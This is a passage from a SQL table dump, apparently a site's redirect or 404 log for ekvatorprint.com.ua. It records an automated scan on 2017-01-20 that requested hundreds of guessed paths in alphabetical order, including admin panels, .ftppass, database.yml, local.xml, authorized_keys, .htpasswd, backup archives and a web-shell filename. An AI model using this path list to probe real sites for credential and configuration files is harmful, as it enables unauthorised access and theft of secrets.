00:00:00',301),(5695,'http://ekvatorprint.com.ua/admintopvnet',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5696,'http://ekvatorprint.com.ua/admintools',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5697,'http://ekvatorprint.com.ua/admintool.jsp',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5698,'http://ekvatorprint.com.ua/adminui',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5699,'http://ekvatorprint.com.ua/adminus',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5700,'http://ekvatorprint.com.ua/adminuser',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5701,'http://ekvatorprint.com.ua/adminusers',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5702,'http://ekvatorprint.com.ua/adminusers.php',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5703,'http://ekvatorprint.com.ua/adminusers.',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5704,'http://ekvatorprint.com.ua/adminv',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5705,'http://ekvatorprint.com.ua/adminv2',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5706,'http://ekvatorprint.com.ua/adminv3',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5707,'http://ekvatorprint.com.ua/adminx',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5708,'http://ekvatorprint.com.ua/adminweb',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5709,'http://ekvatorprint.com.ua/adminxxx',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5710,'http://ekvatorprint.com.ua/adminzone',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5711,'http://ekvatorprint.com.ua/admrev/.ftppass',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5712,'http://ekvatorprint.com.ua/adovbs.inc',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5713,'http://ekvatorprint.com.ua/adminz',NULL,'','',1,0,'2017-01-20 13:27:40','0000-00-00 00:00:00',301),(5714,'http://ekvatorprint.com.ua/admloginuser.php',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5715,'http://ekvatorprint.com.ua/admloginuser.',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5716,'http://ekvatorprint.com.ua/admrev/_files/',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5717,'http://ekvatorprint.com.ua/adsamples/',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5718,'http://ekvatorprint.com.ua/admpar/.ftppass',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5719,'http://ekvatorprint.com.ua/advadmin',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5720,'http://ekvatorprint.com.ua/adv.php',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5721,'http://ekvatorprint.com.ua/advertise',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5722,'http://ekvatorprint.com.ua/ads',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5723,'http://ekvatorprint.com.ua/advertising',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5724,'http://ekvatorprint.com.ua/adv.',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5725,'http://ekvatorprint.com.ua/advisories',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5726,'http://ekvatorprint.com.ua/adview',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5727,'http://ekvatorprint.com.ua/advsearch.',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5728,'http://ekvatorprint.com.ua/afadmin',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5729,'http://ekvatorprint.com.ua/affiliate',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5730,'http://ekvatorprint.com.ua/advsearch.php',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5731,'http://ekvatorprint.com.ua/affiliate.php',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5732,'http://ekvatorprint.com.ua/affadmin',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5733,'http://ekvatorprint.com.ua/affiliate_terms.php',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5734,'http://ekvatorprint.com.ua/affiliate.',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5735,'http://ekvatorprint.com.ua/affiliate_admin',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5736,'http://ekvatorprint.com.ua/affiliates',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5737,'http://ekvatorprint.com.ua/affiliate_terms.',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5738,'http://ekvatorprint.com.ua/agent_admin',NULL,'','',1,0,'2017-01-20 13:27:41','0000-00-00 00:00:00',301),(5739,'http://ekvatorprint.com.ua/ainstall',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5740,'http://ekvatorprint.com.ua/agadmin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5741,'http://ekvatorprint.com.ua/affiliates.sql',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5742,'http://ekvatorprint.com.ua/all',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5743,'http://ekvatorprint.com.ua/albums',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5744,'http://ekvatorprint.com.ua/ajax',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5745,'http://ekvatorprint.com.ua/aiadmin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5746,'http://ekvatorprint.com.ua/alm_admin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5747,'http://ekvatorprint.com.ua/amad.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5748,'http://ekvatorprint.com.ua/ajfhasdfgsagfakjhgd',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5749,'http://ekvatorprint.com.ua/anews_admin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5750,'http://ekvatorprint.com.ua/amministratore.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5751,'http://ekvatorprint.com.ua/answers/error_log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5752,'http://ekvatorprint.com.ua/apache/logs/access.log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5753,'http://ekvatorprint.com.ua/apache/logs/error.log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5754,'http://ekvatorprint.com.ua/apache/logs/access_log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5755,'http://ekvatorprint.com.ua/apache/logs/error_log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5756,'http://ekvatorprint.com.ua/apadminred',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5757,'http://ekvatorprint.com.ua/apadminred.html',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5758,'http://ekvatorprint.com.ua/apc.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5759,'http://ekvatorprint.com.ua/apc/apc.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5760,'http://ekvatorprint.com.ua/apc-nrp.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5761,'http://ekvatorprint.com.ua/apc/index.php',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5762,'http://ekvatorprint.com.ua/aphtpasswd.html',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5763,'http://ekvatorprint.com.ua/api/error_log',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5764,'http://ekvatorprint.com.ua/api/',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5765,'http://ekvatorprint.com.ua/api',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5766,'http://ekvatorprint.com.ua/app-admin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5767,'http://ekvatorprint.com.ua/apibuild.pyc',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5768,'http://ekvatorprint.com.ua/app.config',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5769,'http://ekvatorprint.com.ua/app',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5770,'http://ekvatorprint.com.ua/app/bin',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5771,'http://ekvatorprint.com.ua/app/config/adminConf.json',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5772,'http://ekvatorprint.com.ua/app/composer.lock',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5773,'http://ekvatorprint.com.ua/app/composer.json',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5774,'http://ekvatorprint.com.ua/app/config/database.yml.pgsql',NULL,'','',1,0,'2017-01-20 13:27:42','0000-00-00 00:00:00',301),(5775,'http://ekvatorprint.com.ua/app/config/database.yml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5776,'http://ekvatorprint.com.ua/app/config/database.yml.sqlite3',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5777,'http://ekvatorprint.com.ua/app/config/database.yml_original',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5778,'http://ekvatorprint.com.ua/app/config/global.json',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5779,'http://ekvatorprint.com.ua/app/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5780,'http://ekvatorprint.com.ua/app/config/schema.yml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5781,'http://ekvatorprint.com.ua/app/config/database.yml~',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5782,'http://ekvatorprint.com.ua/app/etc/config.xml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5783,'http://ekvatorprint.com.ua/app/config/parameters.ini',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5784,'http://ekvatorprint.com.ua/app/config/parameters.yml',NULL,'','',2,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5785,'http://ekvatorprint.com.ua/app/config/routes.cfg',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5786,'http://ekvatorprint.com.ua/app/dev',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5787,'http://ekvatorprint.com.ua/app/etc/local.xml',NULL,'','',3,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5788,'http://ekvatorprint.com.ua/app/docs',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5789,'http://ekvatorprint.com.ua/app/etc/local.additional',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5790,'http://ekvatorprint.com.ua/app/etc/enterprise.xml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5791,'http://ekvatorprint.com.ua/app/etc/local.xml.additional',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5792,'http://ekvatorprint.com.ua/app/etc/fpc.xml',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5793,'http://ekvatorprint.com.ua/app/etc/local.xml.phpunit',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5794,'http://ekvatorprint.com.ua/app/etc/local.xml.live',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5795,'http://ekvatorprint.com.ua/app/etc/local.xml.template',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5796,'http://ekvatorprint.com.ua/app/etc/local.xml.vmachine',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5797,'http://ekvatorprint.com.ua/app/etc/local.xml.localRemote',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5798,'http://ekvatorprint.com.ua/app/etc/local.xml.bak',NULL,'','',1,0,'2017-01-20 13:27:43','0000-00-00 00:00:00',301),(5799,'http://ekvatorprint.com.ua/app/etc/local.xml.vmachine.rm',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5800,'http://ekvatorprint.com.ua/app/log/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5801,'http://ekvatorprint.com.ua/app/languages',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5802,'http://ekvatorprint.com.ua/app/logs/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5803,'http://ekvatorprint.com.ua/app/phpunit.xml',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5804,'http://ekvatorprint.com.ua/app/src',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5805,'http://ekvatorprint.com.ua/app/sys',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5806,'http://ekvatorprint.com.ua/app/testing',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5807,'http://ekvatorprint.com.ua/app/unschedule.bat',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5808,'http://ekvatorprint.com.ua/app/vendor',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5809,'http://ekvatorprint.com.ua/app/vendor-src',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5810,'http://ekvatorprint.com.ua/app_admin',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5811,'http://ekvatorprint.com.ua/app_dev.php',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5812,'http://ekvatorprint.com.ua/appadmin',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5813,'http://ekvatorprint.com.ua/appcache.manifest',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5814,'http://ekvatorprint.com.ua/apple',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5815,'http://ekvatorprint.com.ua/applet',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5816,'http://ekvatorprint.com.ua/application.log',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5817,'http://ekvatorprint.com.ua/application/cache/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5818,'http://ekvatorprint.com.ua/application/logs/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5819,'http://ekvatorprint.com.ua/apps',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5820,'http://ekvatorprint.com.ua/applications',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5821,'http://ekvatorprint.com.ua/apps/frontend/config/app.yml',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5822,'http://ekvatorprint.com.ua/apps/frontend/config/databases.yml',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5823,'http://ekvatorprint.com.ua/archive',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5824,'http://ekvatorprint.com.ua/archiver',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5825,'http://ekvatorprint.com.ua/archives',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5826,'http://ekvatorprint.com.ua/arrow',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5827,'http://ekvatorprint.com.ua/archi~1/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5828,'http://ekvatorprint.com.ua/art',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5829,'http://ekvatorprint.com.ua/article',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5830,'http://ekvatorprint.com.ua/article.',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5831,'http://ekvatorprint.com.ua/articles',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5832,'http://ekvatorprint.com.ua/artikeladmin',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5833,'http://ekvatorprint.com.ua/asp.aspx',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5834,'http://ekvatorprint.com.ua/asp/',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5835,'http://ekvatorprint.com.ua/aspnet_client',NULL,'','',1,0,'2017-01-20 13:27:44','0000-00-00 00:00:00',301),(5836,'http://ekvatorprint.com.ua/as-admin',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5837,'http://ekvatorprint.com.ua/aspnet_webadmin',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5838,'http://ekvatorprint.com.ua/asps/',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5839,'http://ekvatorprint.com.ua/aspwpadmin',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5840,'http://ekvatorprint.com.ua/aspnet_files/',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5841,'http://ekvatorprint.com.ua/aspxspy.aspx',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5842,'http://ekvatorprint.com.ua/assets/fckeditor',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5843,'http://ekvatorprint.com.ua/assets/js/fckeditor',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5844,'http://ekvatorprint.com.ua/assets',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5845,'http://ekvatorprint.com.ua/astroadmin',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5846,'http://ekvatorprint.com.ua/asterisk.log',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5847,'http://ekvatorprint.com.ua/assets/npm-debug.log',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5848,'http://ekvatorprint.com.ua/asynchbeans/',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5849,'http://ekvatorprint.com.ua/atlassian-ide-plugin.xml',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5850,'http://ekvatorprint.com.ua/asynchbeans/docs/',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5851,'http://ekvatorprint.com.ua/atom',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5852,'http://ekvatorprint.com.ua/audio',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5853,'http://ekvatorprint.com.ua/attachmentedit.php',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5854,'http://ekvatorprint.com.ua/auth',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5855,'http://ekvatorprint.com.ua/attachmentedit.',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5856,'http://ekvatorprint.com.ua/auth.',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5857,'http://ekvatorprint.com.ua/auth.cgi',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5858,'http://ekvatorprint.com.ua/auth.php',NULL,'','',2,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5859,'http://ekvatorprint.com.ua/auth.htm',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5860,'http://ekvatorprint.com.ua/auth.inc',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5861,'http://ekvatorprint.com.ua/auth.html',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5862,'http://ekvatorprint.com.ua/auth.jsp',NULL,'','',1,0,'2017-01-20 13:27:45','0000-00-00 00:00:00',301),(5863,'http://ekvatorprint.com.ua/auth.pl',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5864,'http://ekvatorprint.com.ua/auth.rb',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5865,'http://ekvatorprint.com.ua/auth.py',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5866,'http://ekvatorprint.com.ua/auth/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5867,'http://ekvatorprint.com.ua/auth/adm',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5868,'http://ekvatorprint.com.ua/auth/admin',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5869,'http://ekvatorprint.com.ua/auth/login',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5870,'http://ekvatorprint.com.ua/auth/login.php',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5871,'http://ekvatorprint.com.ua/auth/login.shtml',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5872,'http://ekvatorprint.com.ua/auth/login.jsp',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5873,'http://ekvatorprint.com.ua/auth/signin',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5874,'http://ekvatorprint.com.ua/auth/login.',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5875,'http://ekvatorprint.com.ua/auth_user_file.txt',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5876,'http://ekvatorprint.com.ua/auth/login.html',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5877,'http://ekvatorprint.com.ua/auth/logon',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5878,'http://ekvatorprint.com.ua/authadmin',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5879,'http://ekvatorprint.com.ua/authenticatedy',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5880,'http://ekvatorprint.com.ua/author',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5881,'http://ekvatorprint.com.ua/authorized_keys',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5882,'http://ekvatorprint.com.ua/authorization.config',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5883,'http://ekvatorprint.com.ua/authors',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5884,'http://ekvatorprint.com.ua/awards',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5885,'http://ekvatorprint.com.ua/awstats',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5886,'http://ekvatorprint.com.ua/awstats.pl',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5887,'http://ekvatorprint.com.ua/awstats/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5888,'http://ekvatorprint.com.ua/axis2/axis2-admin/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5889,'http://ekvatorprint.com.ua/axis1/axis1-admin/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5890,'http://ekvatorprint.com.ua/azureadmin/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5891,'http://ekvatorprint.com.ua/b2badmin/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5892,'http://ekvatorprint.com.ua/b',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5893,'http://ekvatorprint.com.ua/b_admin',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5894,'http://ekvatorprint.com.ua/back-up',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5895,'http://ekvatorprint.com.ua/back-office/',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5896,'http://ekvatorprint.com.ua/back.php',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5897,'http://ekvatorprint.com.ua/bac',NULL,'','',1,0,'2017-01-20 13:27:46','0000-00-00 00:00:00',301),(5898,'http://ekvatorprint.com.ua/back-end/',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5899,'http://ekvatorprint.com.ua/back',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5900,'http://ekvatorprint.com.ua/back.',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5901,'http://ekvatorprint.com.ua/backadmin',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5902,'http://ekvatorprint.com.ua/back.sql',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5903,'http://ekvatorprint.com.ua/backend.php',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5904,'http://ekvatorprint.com.ua/backend.',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5905,'http://ekvatorprint.com.ua/backend/',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5906,'http://ekvatorprint.com.ua/backend_dev.php',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5907,'http://ekvatorprint.com.ua/backend/core/info.xml',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5908,'http://ekvatorprint.com.ua/backend_dev.',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5909,'http://ekvatorprint.com.ua/backend_dev/',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5910,'http://ekvatorprint.com.ua/backup',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5911,'http://ekvatorprint.com.ua/backup.7z',NULL,'','',3,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5912,'http://ekvatorprint.com.ua/backup.htpasswd',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5913,'http://ekvatorprint.com.ua/backup.inc',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5914,'http://ekvatorprint.com.ua/backup.old',NULL,'','',2,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5915,'http://ekvatorprint.com.ua/backup.inc.old',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5916,'http://ekvatorprint.com.ua/backup.tar.bz2',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5917,'http://ekvatorprint.com.ua/backup.sql.old',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 00:00:00',301),(5918,'http://ekvatorprint.com.ua/backup0/',NULL,'','',1,0,'2017-01-20 13:27:47','0000-00-00 